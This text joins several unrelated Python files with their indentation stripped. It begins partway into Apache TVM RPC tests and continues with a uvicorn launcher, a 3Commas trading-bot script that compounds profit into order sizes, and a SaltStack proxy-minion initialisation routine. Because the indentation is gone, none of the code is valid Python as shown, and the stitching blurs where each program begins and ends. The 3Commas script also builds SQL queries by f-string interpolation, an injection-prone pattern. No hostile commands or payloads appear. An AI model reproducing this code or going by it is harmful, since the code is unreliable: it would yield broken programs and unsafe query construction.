with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# start the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# make the file non-executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.asnumpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
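# Hold the requested session open indefinitely; the parent test terminates this
# process, so the loop never exits and the call below is never reached.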
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
main.py
|
from threading import Thread
from uvicorn import run
from web.app import app
from view.App import App
from ws.ws import Client
# Thread.start() returns None, so keep a reference to the thread before starting it.
t = Thread(target=run, args=(app,), kwargs={
"port": 3000
})
t.start()
App().run()
# Client(lambda x: print(f"Token: {x}")).run_sync()
|
compound.py
|
#!/usr/bin/env python3
"""Cyberjunky's 3Commas bot helpers."""
import argparse
import configparser
import json
import logging
import os
import queue
import sqlite3
import sys
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
from pathlib import Path
import apprise
from py3cw.request import Py3CW
class NotificationHandler:
"""Notification class."""
def __init__(self, enabled=False, notify_urls=None):
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def send_notification(self, message, attachments=None):
"""Send a notification if enabled."""
if self.enabled:
msg = f"[3Commas bots helper {program}]\n" + message
self.queue.put((msg, attachments or []))
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
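# Redo the rotation by hand: close the stream, move the live log to a timestamped
# file, prune backups beyond backupCount, reopen the base log and compute the next
# rollover time.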
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, notificationhandler, logstokeep, debug_enabled, notify_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/{program}.log", backupCount=logstokeep
)
# file_handle.setLevel(logging.DEBUG)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.send_notification(message)
def load_config():
"""Create default or load existing config file."""
cfg = configparser.ConfigParser()
if cfg.read(f"{datadir}/{program}.ini"):
return cfg
cfg["settings"] = {
"timezone": "Europe/Amsterdam",
"timeinterval": 3600,
"debug": False,
"logrotate": 7,
"botids": [12345, 67890],
"profittocompound": 1.0,
"3c-apikey": "Your 3Commas API Key",
"3c-apisecret": "Your 3Commas API Secret",
"notifications": False,
"notify-urls": ["notify-url1", "notify-url2"],
}
with open(f"{datadir}/{program}.ini", "w") as cfgfile:
cfg.write(cfgfile)
return None
def init_threecommas_api(cfg):
"""Init the 3commas API."""
return Py3CW(
key=cfg.get("settings", "3c-apikey"),
secret=cfg.get("settings", "3c-apisecret"),
request_options={
"request_timeout": 10,
"nr_of_retries": 3,
"retry_status_codes": [502],
},
)
def get_threecommas_deals(botid):
"""Get all deals from 3Commas from a bot."""
error, data = api.request(
entity="deals",
action="",
payload={
"scope": "finished",
"bot_id": str(botid),
"limit": 100,
},
)
if error:
logger.error("Fetching deals failed with error: %s" % error)
else:
logger.info("Fetched the deals for this bot OK (%s deals)" % len(data))
return data
def check_deal(dealid):
"""Check if deal was already logged."""
data = cursor.execute(f"SELECT * FROM deals WHERE dealid = {dealid}").fetchone()
if data is None:
return False
return True
def update_bot(
thebot, new_base_order_volume, new_safety_order_volume, profit_sum, deals_count
):
"""Update bot with new order volumes."""
bot_name = thebot["name"]
base_order_volume = float(thebot["base_order_volume"])
safety_order_volume = float(thebot["safety_order_volume"])
logger.info(
"Calculated BO volume changed from: %s to %s"
% (base_order_volume, new_base_order_volume)
)
logger.info(
"Calculated SO volume changed from: %s to %s"
% (safety_order_volume, new_safety_order_volume)
)
error, data = api.request(
entity="bots",
action="update",
action_id=str(thebot["id"]),
payload={
"bot_id": thebot["id"],
"name": thebot["name"],
"pairs": thebot["pairs"],
"base_order_volume": new_base_order_volume, # new base order volume
"safety_order_volume": new_safety_order_volume, # new safety order volume
"take_profit": thebot["take_profit"],
"martingale_volume_coefficient": thebot["martingale_volume_coefficient"],
"martingale_step_coefficient": thebot["martingale_step_coefficient"],
"max_active_deals": thebot["max_active_deals"],
"max_safety_orders": thebot["max_safety_orders"],
"safety_order_step_percentage": thebot["safety_order_step_percentage"],
"take_profit_type": thebot["take_profit_type"],
"strategy_list": thebot["strategy_list"],
"active_safety_orders_count": thebot["active_safety_orders_count"],
},
)
if data:
base = thebot["pairs"][0].split("_")[0]
if base == "BTC":
logger.info(
f"Compounded ₿{round(profit_sum, 8)} in profit from {deals_count} deal(s) "
f"made by '{bot_name}'\nChanged BO from ₿{round(base_order_volume, 8)} to "
f"₿{round(new_base_order_volume, 8)}\nChanged SO from "
f"₿{round(safety_order_volume, 8)} to ₿{round(new_safety_order_volume, 8)}",
True,
)
else:
logger.info(
f"Compounded ${round(profit_sum, 4)} in profit from {deals_count} deal(s) "
f"made by '{bot_name}'\nChanged BO from ${round(base_order_volume, 4)} to "
f"${round(new_base_order_volume, 4)}\nChanged SO from "
f"${round(safety_order_volume, 4)} to ${round(new_safety_order_volume, 4)}",
True,
)
else:
logger.error(
"Error occurred updating bot with new BO/SO values: %s" % error["msg"]
)
def process_deals(deals):
"""Check deals from bot."""
deals_count = 0
profit_sum = 0.0
for deal in deals:
deal_id = deal["id"]
# Register deal in database
exist = check_deal(deal_id)
if exist:
logger.debug("Deal with id '%s' already processed, skipping." % deal_id)
else:
# Deal not processed yet
profit = float(deal["final_profit"])
deals_count += 1
profit_sum += profit
db.execute(
f"INSERT INTO deals (dealid, profit) VALUES ({deal_id}, {profit})"
)
logger.info("Finished deals: %s total profit: %s" % (deals_count, profit_sum))
db.commit()
# Calculate profit part to compound
logger.info("Profit available to compound: %s" % profit_sum)
profit_sum *= profit_percentage
logger.info(
"Profit available after applying percentage value (%s): %s "
% (profit_percentage, profit_sum)
)
return (deals_count, profit_sum)
def compound_bot(thebot):
"""Find profit from deals and calculate new SO and BO values."""
bot_name = thebot["name"]
deals = get_threecommas_deals(thebot["id"])
if deals:
deals_count, profit_sum = process_deals(deals)
if profit_sum:
# Bot values to calculate with
base_order_volume = float(thebot["base_order_volume"])
safety_order_volume = float(thebot["safety_order_volume"])
max_active_deals = thebot["max_active_deals"]
max_safety_orders = thebot["max_safety_orders"]
martingale_volume_coefficient = float(
thebot["martingale_volume_coefficient"]
)
funds_so_needed = safety_order_volume
total_so_funds = safety_order_volume
if max_safety_orders > 1:
for i in range(1, max_safety_orders):
funds_so_needed *= float(martingale_volume_coefficient)
total_so_funds += funds_so_needed
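# Illustrative numbers: SO volume 10 with scale 2.0 and 3 max safety orders
# gives 10 + 20 + 40 = 70 total SO funds.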
logger.info("Current bot settings :")
logger.info("Base order volume : %s" % base_order_volume)
logger.info("Safety order volume : %s" % safety_order_volume)
logger.info("Max active deals : %s" % max_active_deals)
logger.info("Max safety orders : %s" % max_safety_orders)
logger.info("SO volume scale : %s" % martingale_volume_coefficient)
# Calculate the BO/SO ratio
bo_percentage = (
100
* float(base_order_volume)
/ (float(base_order_volume) + float(total_so_funds))
)
so_percentage = (
100
* float(total_so_funds)
/ (float(total_so_funds) + float(base_order_volume))
)
logger.info("BO percentage: %s" % bo_percentage)
logger.info("SO percentage: %s" % so_percentage)
# Calculate compound values
bo_profit = ((profit_sum * bo_percentage) / 100) / max_active_deals
so_profit = bo_profit * (safety_order_volume / base_order_volume)
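# The compounded profit is split in the current BO/SO funds ratio; the BO share is
# spread over max_active_deals and the SO share keeps the existing SO/BO volume ratio.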
logger.info("BO compound value: %s" % bo_profit)
logger.info("SO compound value: %s" % so_profit)
# Update the bot
update_bot(
thebot,
(base_order_volume + bo_profit),
(safety_order_volume + so_profit),
profit_sum,
deals_count,
)
else:
logger.info(
f"{bot_name}\nNo (new) profit made, no BO/SO value updates needed!",
True,
)
else:
logger.info(f"{bot_name}\nNo (new) deals found for this bot!", True)
def init_compound_db():
"""Create or open database to store bot and deals data."""
try:
dbname = f"{program}.sqlite3"
dbpath = f"file:{datadir}/{dbname}?mode=rw"
dbconnection = sqlite3.connect(dbpath, uri=True)
logger.info(f"Database '{datadir}/{dbname}' opened successfully")
except sqlite3.OperationalError:
dbconnection = sqlite3.connect(f"{datadir}/{dbname}")
dbcursor = dbconnection.cursor()
logger.info(f"Database '{datadir}/{dbname}' created successfully")
dbcursor.execute("CREATE TABLE deals (dealid INT Primary Key, profit REAL)")
logger.info("Database tables created successfully")
return dbconnection
def upgrade_compound_db():
"""Upgrade database if needed."""
try:
cursor.execute("ALTER TABLE deals ADD COLUMN profit REAL")
logger.info("Database schema upgraded")
except sqlite3.OperationalError:
logger.debug("Database schema is up-to-date")
# Start application
program = Path(__file__).stem
# Parse and interpret options.
parser = argparse.ArgumentParser(description="Cyberjunky's 3Commas bot helper.")
parser.add_argument("-d", "--datadir", help="data directory to use", type=str)
args = parser.parse_args()
if args.datadir:
datadir = args.datadir
else:
datadir = os.getcwd()
# Create or load configuration file
config = load_config()
if not config:
logger = Logger(None, 7, False, False)
logger.info(f"3Commas bot helper {program}!")
logger.info("Started at %s." % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(
f"Created example config file '{datadir}/{program}.ini', edit it and restart the program."
)
sys.exit(0)
else:
# Handle timezone
if hasattr(time, "tzset"):
os.environ["TZ"] = config.get(
"settings", "timezone", fallback="Europe/Amsterdam"
)
time.tzset()
# Init notification handler
notification = NotificationHandler(
config.getboolean("settings", "notifications"),
config.get("settings", "notify-urls"),
)
# Init logging
logger = Logger(
notification,
int(config.get("settings", "logrotate", fallback=7)),
config.getboolean("settings", "debug"),
config.getboolean("settings", "notifications"),
)
logger.info(f"3Commas bot helper {program}")
logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
logger.info(f"Loaded configuration from '{datadir}/{program}.ini'")
if notification.enabled:
logger.info("Notifications are enabled")
else:
logger.info("Notifications are disabled")
# Initialize 3Commas API
api = init_threecommas_api(config)
# Initialize or open database
db = init_compound_db()
cursor = db.cursor()
# Upgrade database if needed
upgrade_compound_db()
if "compound" in program:
# Auto compound profit by tweaking SO/BO
while True:
config = load_config()
logger.info(f"Reloaded configuration from '{datadir}/{program}.ini'")
# User settings
botids = json.loads(config.get("settings", "botids"))
timeint = int(config.get("settings", "timeinterval"))
profit_percentage = float(
config.get("settings", "profittocompound", fallback=1.0)
)
# Walk through all bots specified
for bot in botids:
boterror, botdata = api.request(
entity="bots",
action="show",
action_id=str(bot),
)
if botdata:
compound_bot(botdata)
else:
logger.error("Error occurred compounding bots: %s" % boterror["msg"])
if timeint > 0:
localtime = time.time()
nexttime = localtime + int(timeint)
timeresult = time.strftime("%H:%M:%S", time.localtime(nexttime))
logger.info("Next update in %s Seconds at %s" % (timeint, timeresult), True)
time.sleep(timeint)
else:
break
|
proxy.py
|
# -*- coding: utf-8 -*-
#
# Proxy minion metaproxy modules
#
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import os
import signal
import sys
import types
import logging
import threading
import traceback
# Import Salt Libs
# pylint: disable=3rd-party-module-not-gated
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.serializers.msgpack
import salt.minion
import salt.defaults.exitcodes
import salt.utils.dictupdate
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import range
from salt.minion import ProxyMinion
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
def post_master_init(self, master):
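# Proxy-specific completion of minion startup: compile the async pillar, resolve the
# proxy configuration, load the proxy module and inject the dunder references
# (__proxy__, __salt__, __utils__, ...), start engines, and register the scheduled
# jobs (mine updates, master alive/failback checks and the proxy keepalive).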
log.debug("subclassed LazyLoaded _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[salt.minion.master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
salt.minion.master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
salt.minion.master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(salt.minion.master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(salt.minion.master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# `proxy_keep_alive` defaults to True; when it is set to False the reconnect job is not scheduled
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
